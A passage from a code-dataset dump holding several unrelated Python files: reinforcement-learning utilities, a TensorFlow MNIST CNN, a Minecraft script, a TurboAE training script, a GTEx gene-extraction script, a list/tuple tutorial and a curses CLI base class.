y/n')\n if reply == 'y':\n game()\n elif reply == 'n':\n exit()\n\n\ndef restart():\n game()\n\ndef exit():\n #quit the program\n raise SystemExit\n\n#Generate number\nnum = random.randint(1,100)\nnum = int(num)\n\n\n\ngame()\n","sub_path":"NGv2.py","file_name":"NGv2.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"359428306","text":"import numpy as np\nimport scipy.ndimage as ndimage\nimport tensorflow as tf\nimport blosc\nimport random\n#from prototype11.atari_environment_wrapper import atari_environment\nfrom custom_environments.cart import Cart\nfrom custom_environments.cartpole import CartPole\nfrom custom_environments.pygames import ple_wrapper\nimport gym\n#from matplotlib import pyplot as plt\n#import pylab\nimport uuid\n\ndef process_frame2(frame):\n s = np.dot(frame, np.array([.299, .587, .114])).astype(np.uint8)\n s = ndimage.zoom(s, (0.4, 0.525))\n #s.resize((84, 84, 1))\n return s\n\nclass Memory:\n def __init__(self, size):\n self.max_size = size\n self.mem = []\n\n def add(self, element):\n self.mem.append(element)\n\n if len(self.mem) > self.max_size:\n self.mem.pop(0)\n\n def sample(self, size):\n size = min(size, len(self.mem))\n return random.sample(self.mem, size)\n\nclass Memory_with_compression:\n def __init__(self, size, shape=[84, 84, 4]):\n self.shape = [1] + shape\n self.max_size = size\n self.mem = []\n\n def add(self, element):\n ele = []\n ele.append(blosc.compress(np.reshape(element[0], np.prod(np.array(self.shape))).tobytes(), typesize=1)) #Current state\n ele.append(element[1]) #Action\n ele.append(element[2]) #Reward\n ele.append(blosc.compress(np.reshape(element[3], np.prod(np.array(self.shape))).tobytes(), typesize=1)) #Next state\n ele.append(element[4]) #Done\n self.mem.append(ele)\n\n if len(self.mem) > self.max_size:\n self.mem.pop(0)\n\n def sample(self, size):\n size = min(size, len(self.mem))\n elements = random.sample(self.mem, size)\n\n elements_decompressed = []\n for i in range(size):\n element_decompressed = []\n element_decompressed.append(np.reshape(np.fromstring(blosc.decompress(elements[i][0]), dtype=np.uint8), tuple(self.shape)))\n element_decompressed.append(elements[i][1])\n element_decompressed.append(elements[i][2])\n element_decompressed.append(np.reshape(np.fromstring(blosc.decompress(elements[i][3]), dtype=np.uint8), tuple(self.shape)))\n element_decompressed.append(elements[i][4])\n elements_decompressed.append(element_decompressed)\n return elements_decompressed\n\n def __del__(self):\n del self.mem\n\nclass Memory_with_compression2:\n def __init__(self, size, shape=[84, 84, 4]):\n self.shape = [1] + shape\n self.max_size = size\n self.mem = []\n\n def add(self, element):\n ele = []\n ele.append(blosc.compress(np.reshape(element[0], np.prod(np.array(self.shape))).tobytes(), typesize=1)) #States\n ele.append(element[1]) #Action\n ele.append(element[2]) #Reward\n ele.append(element[3]) #Done\n self.mem.append(ele)\n\n if len(self.mem) > self.max_size:\n self.mem.pop(0)\n\n def sample(self, size):\n size = min(size, len(self.mem))\n elements = random.sample(self.mem, size)\n\n elements_decompressed = []\n for i in range(size):\n element_decompressed = []\n element_decompressed.append(np.reshape(np.fromstring(blosc.decompress(elements[i][0]), dtype=np.uint8), tuple(self.shape)))\n element_decompressed.append(elements[i][1])\n element_decompressed.append(elements[i][2])\n element_decompressed.append(elements[i][3])\n 
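#collect the decoded [state, action, reward, done] entry into the sampled batch\n            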
elements_decompressed.append(element_decompressed)\n return elements_decompressed\n\n def __del__(self):\n del self.mem\n\ndef update_target_graph(from_scope, to_scope):\n from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)\n to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)\n\n op_holder = []\n for from_var, to_var in zip(from_vars, to_vars):\n op_holder.append(to_var.assign(from_var))\n return op_holder\n\ndef update_target_graph_vars(from_vars, to_vars):\n op_holder = []\n for from_var, to_var in zip(from_vars, to_vars):\n op_holder.append(to_var.assign(from_var))\n return op_holder\n\n#A soft version of update target graph\ndef update_target_graph2(from_scope, to_scope, tau=.001):\n from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)\n to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)\n\n op_holder = []\n for from_var, to_var in zip(from_vars, to_vars):\n op_holder.append(to_var.assign(tf.multiply(from_var, tau) + tf.multiply(to_var, 1. - tau)))\n return op_holder\n\ndef update_target_graph3(from_vars, to_vars, tau=.001):\n op_holder = []\n for from_var, to_var in zip(from_vars, to_vars):\n op_holder.append(to_var.assign(tf.multiply(from_var, tau) + tf.multiply(to_var, 1. - tau)))\n return op_holder\n\ndef split(array, w, s):\n assert len(array.shape) == 4\n channels = array.shape[-1]\n sliced = []\n rbegin = 0; cbegin = 0;\n while rbegin + w <= array.shape[1]:\n cbegin = 0\n while cbegin + w <= array.shape[2]:\n sliced.append(array[:, rbegin:rbegin+w, cbegin:cbegin+w, :])\n cbegin += s\n rbegin += s\n\n sliced = np.concatenate(sliced, axis=0)\n sliced = np.reshape(sliced, (-1, w * w * channels))\n sliced = sliced.astype(np.float64) / 255.\n return sliced\n\ndef unison_shuffled_copies(a, b):\n assert len(a) == len(b)\n p = np.random.permutation(len(a))\n return a[p], b[p]\n\ndef shuffle(a):\n p = np.random.permutation(len(a))\n return a[p]\n\nclass env_interface:\n def __init__(self, interface, rom=None, pixel_feature=None, padding=False, render=True):\n assert interface in ['gym', 'gym!atari', 'ale', 'custom_cart', 'custom_cartpole', 'ple']\n if interface in ['gym', 'ale']:\n assert rom is not None\n self.interface = interface\n self.rom = rom\n\n if interface in ['custom_cart', 'custom_cartpole']:\n assert pixel_feature in [True, False]\n self.pixel_feature = pixel_feature\n self.padding = padding\n self.render = render\n\n if self.interface == 'gym':\n self.env = gym.make(self.rom)\n self.action_size = self.env.action_space.n\n self.obs_space_shape = (210, 160, 3)\n if self.interface == 'gym!atari':\n self.env = gym.make(self.rom)\n self.action_size = self.env.action_space.n\n self.obs_space_shape = self.env.observation_space.shape\n elif self.interface == 'ale':\n self.env = atari_environment(self.rom, display_screen=False)\n self.action_size = self.env.num_actions\n self.obs_space_shape = (210, 160, 3)\n elif self.interface == 'custom_cart':\n self.env = Cart(pixelFeature=self.pixel_feature, render=self.render)\n if self.env.pixelFeature:\n self.obs_space_shape = self.env.screenSize\n elif self.env.pixelFeature == False and self.padding == True:\n self.obs_space_shape = (2, 2)\n else:\n self.obs_space_shape = (2,)\n self.action_size = self.env.numActions\n elif self.interface == 'custom_cartpole':\n self.env = CartPole(pixelFeature=self.pixel_feature, render=self.render)\n if self.env.pixelFeature:\n self.obs_space_shape = self.env.screenSize\n elif self.env.pixelFeature == False and 
self.padding == True:\n self.obs_space_shape = (2, 2)\n else:\n self.obs_space_shape = (4,)\n self.action_size = self.env.numActions\n elif self.interface == 'ple':\n self.env = ple_wrapper(rom)\n self.obs_space_shape = tuple(self.env.screen_dims)\n self.action_size = self.env.action_size\n\n def reset(self):\n if self.interface == 'gym':\n frame = process_frame2(self.env.reset())\n return frame\n elif self.interface == 'gym!atari':\n frame = self.env.reset()\n return frame\n elif self.interface == 'ale':\n frame = self.env.reset()\n return frame\n elif self.interface == 'custom_cart':\n self.env = Cart(pixelFeature=self.pixel_feature, render=self.render)\n frame = self.env.getCurrentState()\n return self.pad(frame)\n elif self.interface == 'custom_cartpole':\n self.env = CartPole(pixelFeature=self.pixel_feature, render=self.render)\n frame = self.env.getCurrentState()\n return self.pad(frame)\n elif self.interface == 'ple':\n return self.env.reset()\n\n def step(self, action):\n if self.interface == 'gym':\n frame, reward, done, info = self.env.step(action)\n frame = process_frame2(frame)\n return frame, reward, done, info \n if self.interface == 'gym!atari':\n frame, reward, done, info = self.env.step(action)\n return frame, reward, done, info\n elif self.interface == 'ale':\n frame, reward, done = self.env.step(action)\n return frame, float(reward), done, None\n elif self.interface == 'custom_cart':\n frame, reward, done = self.env.act(action - 1)\n return self.pad(frame) , reward, done, None\n elif self.interface == 'custom_cartpole':\n frame, reward, done = self.env.act(action - 1)\n return self.pad(frame) , reward, done, None\n elif self.interface == 'ple':\n frame, reward, done = self.env.step(action)\n return frame, reward, done, None\n \n def pad(self, frame):\n if self.padding == False:\n return frame\n assert self.pixel_feature == False\n if self.interface == 'custom_cart':\n ret = np.concatenate([frame[..., np.newaxis], np.zeros((2, 1))], axis=-1)\n return ret\n elif self.interface == 'custom_cartpole':\n return frame.reshape((2, 2,))\n\n def __del__(self):\n if self.interface == 'gym':\n self.env.close()\n\ndef parse_states(states, mode):\n assert mode in ['gbm', 'cc', 'gae']\n\n if mode == 'gbm':\n assert states.shape[-1] == 2\n return states[:, :, :, 0][..., np.newaxis], states[:, :, :, 1][..., np.newaxis]\n elif mode == 'cc' or mode == 'gae':\n assert len(states.shape) == 4\n return states, states\n\ndef parse_split_shuffle_states(states, mode, w, s):\n assert mode in ['gbm', 'cc', 'gae']\n\n if mode == 'gbm':\n x = states[:, :, :, 0][..., np.newaxis]\n y = states[:, :, :, 1][..., np.newaxis]\n x = split(x, w, s)\n y = split(y, w, s)\n x, y = unison_shuffled_copies(x, y)\n return x, y\n elif mode == 'cc' or mode == 'gae':\n x = split(states, w, s)\n x = shuffle(x)\n return x, x\n\n# Taken from https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py, which is\n# based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab\nclass OrnsteinUhlenbeckActionNoise:\n def __init__(self, mu, sigma=0.3, theta=.15, dt=1e-2, x0=None):\n self.theta = theta\n self.mu = mu\n self.sigma = sigma\n self.dt = dt\n self.x0 = x0\n self.reset()\n\n def __call__(self):\n x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \\\n self.sigma * np.sqrt(self.dt) * np.random.normal(size=self.mu.shape)\n self.x_prev = x\n return x\n\n def reset(self):\n self.x_prev = self.x0 if self.x0 is not None else np.zeros_like(self.mu)\n\n def 
__repr__(self):\n return 'OrnsteinUhlenbeckActionNoise(mu={}, sigma={})'.format(self.mu, self.sigma)\n\ndef log(x):\n return tf.log(tf.maximum(x, 1e-6))\n\ndef lrelu(x, alpha=.2):\n return tf.nn.relu(x) - alpha * tf.nn.relu(-x)\n\ndef sample_z(batch_size, latent_size):\n #return np.random.uniform(-1., 1., [batch_size, latent_size])\n return np.random.normal(0., 1., [batch_size, latent_size])\n\ndef dispims(M, height, width, border=0, bordercolor=0.0, **kwargs):\n \"\"\" Display the columns of matrix M in a montage. \"\"\"\n numimages = M.shape[1]\n n0 = np.int(np.ceil(np.sqrt(numimages)))\n n1 = np.int(np.ceil(np.sqrt(numimages)))\n im = bordercolor*\\\n np.ones(((height+border)*n1+border,(width+border)*n0+border),dtype=' (3, 3, 1, 8) --> (None, 28, 28, 8) --> (None, 14, 14, 8)\r\nwith tf.name_scope('conv1'):\r\n weights = tf.Variable(tf.truncated_normal([3, 3, 1, nF1], mean=0.0, stddev=0.1), tf.float32, name='weights')\r\n biasses = tf.Variable(tf.constant(0.1, shape=[nF1]), tf.float32, name='biasses')\r\n conv = tf.nn.conv2d(X_, weights, strides=[1,1,1,1], padding='SAME')\r\n conv = tf.nn.bias_add(conv, biasses, name='conv')\r\n relu = tf.nn.relu(conv, name='relu')\r\n pool = tf.nn.max_pool(relu, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\r\n\r\n# Second Convolutional Layer\r\n# (None, 14, 14, 8) --> (3, 3, 8, 12) --> (None, 14, 14, 12) --> (None, 7, 7, 12)\r\nwith tf.name_scope('conv2'):\r\n weights = tf.Variable(tf.truncated_normal([3, 3, nF1, nF2], mean=0.0, stddev=0.1), tf.float32, name='weights')\r\n biasses = tf.Variable(tf.constant(0.1, shape=[nF2]), tf.float32, name='biasses')\r\n conv = tf.nn.conv2d(pool, weights, strides=[1,1,1,1], padding='SAME')\r\n conv = tf.nn.bias_add(conv, biasses, name='conv')\r\n relu = tf.nn.relu(conv, name='relu')\r\n pool = tf.nn.max_pool(relu, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\r\n\r\npool_shape = pool.get_shape().as_list()\r\nn_flat = pool_shape[1] * pool_shape[2] * pool_shape[3]\r\n# (None, 7, 7, 12) --> (None, 7*7*12)\r\npool_flat = tf.reshape(pool, shape=[-1, n_flat])\r\n\r\n# First Fully Connected Layer\r\n# (None, 7*7*12) --> (None, 120)\r\nwith tf.name_scope('fc1'):\r\n weights = tf.Variable(tf.truncated_normal([n_flat, nFc1], mean=0.0, stddev=0.1), tf.float32, name='weights')\r\n biasses = tf.Variable(tf.constant(0.1, shape=[nFc1]), tf.float32, name='biasses')\r\n fc = tf.matmul(pool_flat, weights)\r\n fc = tf.nn.bias_add(fc, biasses, name='fc')\r\n relu = tf.nn.relu(fc, name='relu')\r\n fc = tf.nn.dropout(relu, keep_prob=keep_prob)\r\n \r\n# Second Fully Connected Layer\r\n# (None, 120) --> (None, 10)\r\nwith tf.name_scope('fc2'):\r\n weights = tf.Variable(tf.truncated_normal([nFc1, n_classes], mean=0.0, stddev=0.1), tf.float32, name='weights')\r\n biasses = tf.Variable(tf.constant(0.1, shape=[n_classes]), tf.float32, name='biasses')\r\n fc = tf.matmul(fc, weights)\r\n fc = tf.nn.bias_add(fc, biasses, name='fc')\r\n logits = tf.nn.softmax(fc)\r\n\r\n# loss\r\nloss = -tf.reduce_mean(Y * tf.log(logits))\r\n \r\n# optimizer\r\nopt = tf.train.AdamOptimizer(learning_rate=0.001).minimize(loss)\r\n\r\n# accuracy\r\naccuracy = tf.equal(tf.argmax(logits, axis=1), tf.argmax(Y, axis=1))\r\naccuracy = tf.cast(accuracy, tf.float32)\r\naccuracy = tf.reduce_mean(accuracy)\r\n\r\n# training variables\r\nn_epochs = 5\r\nbatch_size = 128\r\nn_itrs = n_train // batch_size\r\ndisplay_step = 10\r\n\r\nwith tf.Session() as sess:\r\n \r\n # initialize variables\r\n sess.run(tf.global_variables_initializer())\r\n \r\n for epoch in 
range(n_epochs):\r\n for itr in range(n_itrs):\r\n \r\n batch_x, batch_y = mnist.train.next_batch(batch_size)\r\n \r\n feed_dict = {X: batch_x, Y: batch_y, keep_prob: 0.8}\r\n sess.run(opt, feed_dict=feed_dict)\r\n \r\n if ((itr+1) % display_step == 0):\r\n # evaluate for minibatch\r\n feed_dict = {X: batch_x, Y: batch_y, keep_prob: 1.0}\r\n loss_val, acc_val = sess.run([loss, accuracy], feed_dict=feed_dict)\r\n \r\n print('epoch= ', epoch, 'minibatch loss= ', loss_val, 'minibatch acc= ', acc_val)\r\n \r\n \r\n # evaluate in each epoch\r\n feed_dict = {X: mnist.test.images,\r\n Y: mnist.test.labels,\r\n keep_prob: 1.0}\r\n loss_val, acc_val = sess.run([loss, accuracy], feed_dict=feed_dict)\r\n \r\n print('epoch= ', epoch, 'epoch loss= ', loss_val, 'epoch acc= ', acc_val)\r\n\r\n\r\n\r\n","sub_path":"codes/week2/mnist_cnn_dropout.py","file_name":"mnist_cnn_dropout.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"530742653","text":"import time,mcpi.minecraft as minecraft #imports necessary modules and renames one as minecraft for easy of use\nmc=minecraft.Minecraft.create() # Creates game and connects to it.\n\ntime.sleep(3)\n\ndef place_flower():\n while True:\n x,y,z=mc.player.getPos()\n mc.setBlock(x,y,z,38)\n time.sleep(0.2)\n\ndef place_gold():\n while True:\n x,y,z=mc.player.getPos()\n mc.setBlock(x,float(y-0.2),z,41)\n time.sleep(0.05)\n\n\nplace_gold()\n","sub_path":"Minecraft/flower_follow_minecraft.py","file_name":"flower_follow_minecraft.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"324720399","text":"__author__ = 'yihanjiang'\n# update 10/18/2019, code to replicate TurboAE paper in NeurIPS 2019.\n# Tested on PyTorch 1.0.\n# TBD: remove all non-TurboAE related functions.\n\nimport torch\nimport torch.optim as optim\nimport numpy as np\nimport sys\nfrom get_args import get_args\nfrom trainer import train, validate, test\n\nfrom numpy import arange\nfrom numpy.random import mtrand\n\n# utils for logger\nclass Logger(object):\n def __init__(self, filename, stream=sys.stdout):\n self.terminal = stream\n self.log = open(filename, 'a')\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message)\n\n def flush(self):\n pass\n\ndef import_enc(args):\n # choose encoder\n\n if args.encoder == 'TurboAE_rate3_rnn':\n from encoders import ENC_interRNN as ENC\n\n elif args.encoder in ['TurboAE_rate3_cnn', 'TurboAE_rate3_cnn_dense']:\n from encoders import ENC_interCNN as ENC\n\n elif args.encoder == 'turboae_2int':\n from encoders import ENC_interCNN2Int as ENC\n\n elif args.encoder == 'rate3_cnn':\n from encoders import CNN_encoder_rate3 as ENC\n\n elif args.encoder in ['TurboAE_rate3_cnn2d', 'TurboAE_rate3_cnn2d_dense']:\n from encoders import ENC_interCNN2D as ENC\n\n elif args.encoder == 'TurboAE_rate3_rnn_sys':\n from encoders import ENC_interRNN_sys as ENC\n\n elif args.encoder == 'TurboAE_rate2_rnn':\n from encoders import ENC_turbofy_rate2 as ENC\n\n elif args.encoder == 'TurboAE_rate2_cnn':\n from encoders import ENC_turbofy_rate2_CNN as ENC # not done yet\n\n elif args.encoder in ['Turbo_rate3_lte', 'Turbo_rate3_757']:\n from encoders import ENC_TurboCode as ENC # DeepTurbo, encoder not trainable.\n\n elif args.encoder == 'rate3_cnn2d':\n from encoders import ENC_CNN2D as ENC\n\n else:\n print('Unknown Encoder, stop')\n\n return ENC\n\ndef 
import_dec(args):\n\n if args.decoder == 'TurboAE_rate2_rnn':\n from decoders import DEC_LargeRNN_rate2 as DEC\n\n elif args.decoder == 'TurboAE_rate2_cnn':\n from decoders import DEC_LargeCNN_rate2 as DEC # not done yet\n\n elif args.decoder in ['TurboAE_rate3_cnn', 'TurboAE_rate3_cnn_dense']:\n from decoders import DEC_LargeCNN as DEC\n\n elif args.decoder == 'turboae_2int':\n from decoders import DEC_LargeCNN2Int as DEC\n\n elif args.encoder == 'rate3_cnn':\n from decoders import CNN_decoder_rate3 as DEC\n\n elif args.decoder in ['TurboAE_rate3_cnn2d', 'TurboAE_rate3_cnn2d_dense']:\n from decoders import DEC_LargeCNN2D as DEC\n\n elif args.decoder == 'TurboAE_rate3_rnn':\n from decoders import DEC_LargeRNN as DEC\n\n elif args.decoder == 'nbcjr_rate3': # ICLR 2018 paper\n from decoders import NeuralTurbofyDec as DEC\n\n elif args.decoder == 'rate3_cnn2d':\n from decoders import DEC_CNN2D as DEC\n\n return DEC\n\nif __name__ == '__main__':\n #################################################\n # load args & setup logger\n #################################################\n identity = str(np.random.random())[2:8]\n print('[ID]', identity)\n\n # put all printed things to log file\n logfile = open('./logs/'+identity+'_log.txt', 'a')\n sys.stdout = Logger('./logs/'+identity+'_log.txt', sys.stdout)\n\n args = get_args()\n print(args)\n\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n #################################################\n # Setup Channel AE: Encoder, Decoder, Channel\n #################################################\n # choose encoder and decoder.\n ENC = import_enc(args)\n DEC = import_dec(args)\n\n # setup interleaver.\n if args.is_interleave == 1: # fixed interleaver.\n seed = np.random.randint(0, 1)\n rand_gen = mtrand.RandomState(seed)\n p_array1 = rand_gen.permutation(arange(args.block_len))\n p_array2 = rand_gen.permutation(arange(args.block_len))\n\n elif args.is_interleave == 0:\n p_array1 = range(args.block_len) # no interleaver.\n p_array2 = range(args.block_len) # no interleaver.\n else:\n seed = np.random.randint(0, args.is_interleave)\n rand_gen = mtrand.RandomState(seed)\n p_array1 = rand_gen.permutation(arange(args.block_len))\n seed = np.random.randint(0, args.is_interleave)\n rand_gen = mtrand.RandomState(seed)\n p_array2 = rand_gen.permutation(arange(args.block_len))\n\n print('using random interleaver', p_array1, p_array2)\n\n if args.encoder == 'turboae_2int' and args.decoder == 'turboae_2int':\n encoder = ENC(args, p_array1, p_array2)\n decoder = DEC(args, p_array1, p_array2)\n else:\n encoder = ENC(args, p_array1)\n decoder = DEC(args, p_array1)\n\n # choose support channels\n from channel_ae import Channel_AE\n model = Channel_AE(args, encoder, decoder).to(device)\n\n # model = Channel_ModAE(args, encoder, decoder).to(device)\n\n\n # make the model parallel\n if args.is_parallel == 1:\n model.enc.set_parallel()\n model.dec.set_parallel()\n\n # weight loading\n if args.init_nw_weight == 'default':\n pass\n\n else:\n pretrained_model = torch.load(args.init_nw_weight)\n\n try:\n model.load_state_dict(pretrained_model.state_dict(), strict = False)\n\n except:\n model.load_state_dict(pretrained_model, strict = False)\n\n model.args = args\n\n print(model)\n\n\n ##################################################################\n # Setup Optimizers, only Adam and Lookahead for now.\n ##################################################################\n\n if args.optimizer == 'lookahead':\n 
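# Lookahead(k=5, alpha=0.5) wraps the plain Adam base optimizers created below\n        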
print('Using Lookahead Optimizers')\n from optimizers import Lookahead\n lookahead_k = 5\n lookahead_alpha = 0.5\n if args.num_train_enc != 0 and args.encoder not in ['Turbo_rate3_lte', 'Turbo_rate3_757']: # no optimizer for encoder\n enc_base_opt = optim.Adam(model.enc.parameters(), lr=args.enc_lr)\n enc_optimizer = Lookahead(enc_base_opt, k=lookahead_k, alpha=lookahead_alpha)\n\n if args.num_train_dec != 0:\n dec_base_opt = optim.Adam(filter(lambda p: p.requires_grad, model.dec.parameters()), lr=args.dec_lr)\n dec_optimizer = Lookahead(dec_base_opt, k=lookahead_k, alpha=lookahead_alpha)\n\n general_base_opt = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()),lr=args.dec_lr)\n general_optimizer = Lookahead(general_base_opt, k=lookahead_k, alpha=lookahead_alpha)\n\n else: # Adam, SGD, etc....\n if args.optimizer == 'adam':\n OPT = optim.Adam\n elif args.optimizer == 'sgd':\n OPT = optim.SGD\n else:\n OPT = optim.Adam\n\n if args.num_train_enc != 0 and args.encoder not in ['Turbo_rate3_lte', 'Turbo_rate3_757']: # no optimizer for encoder\n enc_optimizer = OPT(model.enc.parameters(),lr=args.enc_lr)\n\n if args.num_train_dec != 0:\n dec_optimizer = OPT(filter(lambda p: p.requires_grad, model.dec.parameters()), lr=args.dec_lr)\n\n general_optimizer = OPT(filter(lambda p: p.requires_grad, model.parameters()),lr=args.dec_lr)\n\n #################################################\n # Training Processes\n #################################################\n report_loss, report_ber = [], []\n\n for epoch in range(1, args.num_epoch + 1):\n\n if args.joint_train == 1 and args.encoder not in ['Turbo_rate3_lte', 'Turbo_rate3_757']:\n for idx in range(args.num_train_enc+args.num_train_dec):\n train(epoch, model, general_optimizer, args, use_cuda = use_cuda, mode ='encoder')\n\n else:\n if args.num_train_enc > 0 and args.encoder not in ['Turbo_rate3_lte', 'Turbo_rate3_757']:\n for idx in range(args.num_train_enc):\n train(epoch, model, enc_optimizer, args, use_cuda = use_cuda, mode ='encoder')\n\n if args.num_train_dec > 0:\n for idx in range(args.num_train_dec):\n train(epoch, model, dec_optimizer, args, use_cuda = use_cuda, mode ='decoder')\n\n this_loss, this_ber = validate(model, general_optimizer, args, use_cuda = use_cuda)\n report_loss.append(this_loss)\n report_ber.append(this_ber)\n\n if args.print_test_traj == True:\n print('test loss trajectory', report_loss)\n print('test ber trajectory', report_ber)\n print('total epoch', args.num_epoch)\n\n #################################################\n # Testing Processes\n #################################################\n\n torch.save(model.state_dict(), './tmp/torch_model_'+identity+'.pt')\n print('saved model', './tmp/torch_model_'+identity+'.pt')\n\n if args.is_variable_block_len:\n print('testing block length',args.block_len_low )\n test(model, args, block_len=args.block_len_low, use_cuda = use_cuda)\n print('testing block length',args.block_len )\n test(model, args, block_len=args.block_len, use_cuda = use_cuda)\n print('testing block length',args.block_len_high )\n test(model, args, block_len=args.block_len_high, use_cuda = use_cuda)\n\n else:\n test(model, args, use_cuda = use_cuda)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"508295996","text":"def SingleGene(inF, Genes, HeadCutOff=10):\n D = {}\n\n inFile = open(inF)\n for line in inFile:\n line = 
line.strip()\n fields = line.split('\\t')\n if len(fields) < HeadCutOff:\n pass\n else:\n head = line\n for g in Genes:\n D.setdefault(g, [head])\n break\n\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n g = fields[1]\n if g in Genes:\n D[g].append(line)\n\n for g in Genes:\n print('Number of lines (including head): ' + str(len(D[g])))\n ouFile = open(inF + '_' + g, 'w')\n ouFile.write('\\n'.join(D[g]) + '\\n')\n ouFile.close()\n inFile.close()\n\nMT = ['MT-ATP6','MT-ATP8','MT-ND1','MT-ND2','MT-ND3','MT-ND4','MT-ND4L','MT-ND5','MT-ND6','MT-CO1','MT-CO2','MT-CO3','MT-CYB']\nSingleGene('GTEx_GeneReadCounts', Genes=['IMMT','RBM20', 'LDB3', 'CAMK2D'] + MT)\nSingleGene('GTEx_GeneTPM', Genes=['IMMT','RBM20', 'LDB3', 'CAMK2D'] + MT)\n\n\n","sub_path":"Data/GTEx/GTExV7/IMMT/02-SingleGene.py","file_name":"02-SingleGene.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"221651887","text":"# A list is an ordered collection; elements can be added and removed at any time\nclassmates = [\"Michael\", \"Bob\", \"Tracy\"]\nprint(len(classmates))\nprint(classmates[0], classmates[1], classmates[2])\n\n# Get the last elements: -1, -2 ... -n\nprint(classmates[-1])\nprint(classmates[-2])\n\n# A list is a mutable ordered sequence, so elements can be appended to its end\nclassmates.append(\"Adam\")\nprint(classmates[-1])\n\n# Insert an element at a specified position\nclassmates.insert(1, \"Jack\")\ni = 0\nfor classmate in classmates:\n print(str(i) + \" \" + classmate)\n i = i + 1\n\n# Remove the last element of the list\nclassmates.pop()\ni = 0\nfor classmate in classmates:\n print(str(i) + \" \" + classmate)\n i = i + 1\n\n# Replace the value of an element\nclassmates[1] = \"Admin\"\ni = 0\nfor classmate in classmates:\n print(str(i) + \" \" + classmate)\n i = i + 1\n\n# A list can store elements of different types\nLS = [\"Panda\", 123, \"15gdy\"]\ni = 0\nfor L in LS:\n print(str(i) + \" \" + str(L))\n i = i + 1\n\n# An element of a list can itself be another list\nLS = [\"A\", \"B\", \"C\", [\"D\", \"E\", \"F\"], \"G\"]\nfor L in LS:\n print(L)\n\nprint(classmates)\n\n# A tuple is an ordered sequence; once initialized, a tuple cannot be modified\nTuple = (\"A\", \"B\", \"C\", \"D\")\nprint(Tuple)\n\n# The tuple Tuple cannot be changed anymore; it has no methods such as append() or insert().\n# Other ways of accessing elements are the same as for a list: Tuple[0] and Tuple[-1] work as usual, but you cannot assign a different element.\n\n# A \"mutable\" tuple\nt = ('a', 'b', ['A', 'B'])\nprint(t)\nt[2][0] = \"X\"\nt[2][1] = \"Y\"\nprint(t)\n","sub_path":"ListTuple.py","file_name":"ListTuple.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"555703465","text":"__author__ = 'Marvin Smith'\n\n\n# Python Libraries\nimport curses, logging\n\n#------------------------------------#\n#- Base CLI Window Object -#\n#------------------------------------#\nclass CLI_Window_Base(object):\n\n # Is Running\n is_running = True\n\n # Database Manager\n database_manager = None\n\n # Window Title\n window_title = None\n\n\n #-----------------------------#\n #- Constructor -#\n #-----------------------------#\n def __init__(self, window_title):\n\n # Set the window title\n self.window_title = window_title\n\n\n #----------------------------------#\n #- Render the Window -#\n #----------------------------------#\n def Render(self, screen, database_manager):\n raise Exception('Not implemented in base type.')\n\n\n #------------------------#\n #- Run CLI -#\n #------------------------#\n def Run(self, stdscr, database_manager, init_curses=False):\n\n # Check if we need to initialize curses\n if init_curses is True:\n self.Initialize_Curses()\n\n\n # Set the screen\n self.screen = stdscr\n\n # Database manager\n self.database_manager = 
database_manager\n\n\n # While running\n while self.is_running is True:\n\n # Render the Main Window\n self.Render()\n\n # Get the input\n c = self.screen.getch()\n\n # Process the Keyboard Input\n self.Process_Keyboard_Input(c)\n\n # Always return the database manager\n return self.database_manager\n\n\n # ------------------------------ #\n # - Initialize Curses - #\n # ------------------------------ #\n def Initialize_Curses(self):\n\n # Initialize Color Pairs\n logging.debug('Initializing Curses Color Pairs.')\n\n # Use for Cursor Overlays\n curses.init_pair( 1, curses.COLOR_BLACK, curses.COLOR_WHITE)\n\n # Use for Error Windows\n curses.init_pair( 2, curses.COLOR_BLACK, curses.COLOR_RED)\n\n # Use for Error Text\n curses.init_pair( 3, curses.COLOR_RED, curses.COLOR_BLACK)\n\n # Use for Simple Backgrounds\n curses.init_pair( 4, curses.COLOR_WHITE, curses.COLOR_BLUE )\n curses.init_pair( 5, curses.COLOR_BLUE, curses.COLOR_WHITE )\n\n #-------------------------------------------#\n #- Check if Input is a Character -#\n #-------------------------------------------#\n def Is_Character(self, input):\n\n # a-z\n if input >= ord('a') and input <= ord('z'):\n return True\n\n # A-Z\n if input >= ord('A') and input <= ord('Z'):\n return True\n\n # Number\n if input >= ord('0') and input <= ord('9'):\n return True\n\n # Special Characters\n if input in [ord(x) for x in [' ', '.', '?']]:\n return True\n\n return False\n\n\n #---------------------------------------------#\n #- Delete a character from the input -#\n #---------------------------------------------#\n def Remove_Letter(self, text, cursor):\n\n # Back up\n if cursor < len(text)+1:\n text = text[0:cursor-1] + text[cursor:]\n\n # Fix the cursor\n cursor = max( cursor-1, 0)\n return [text, 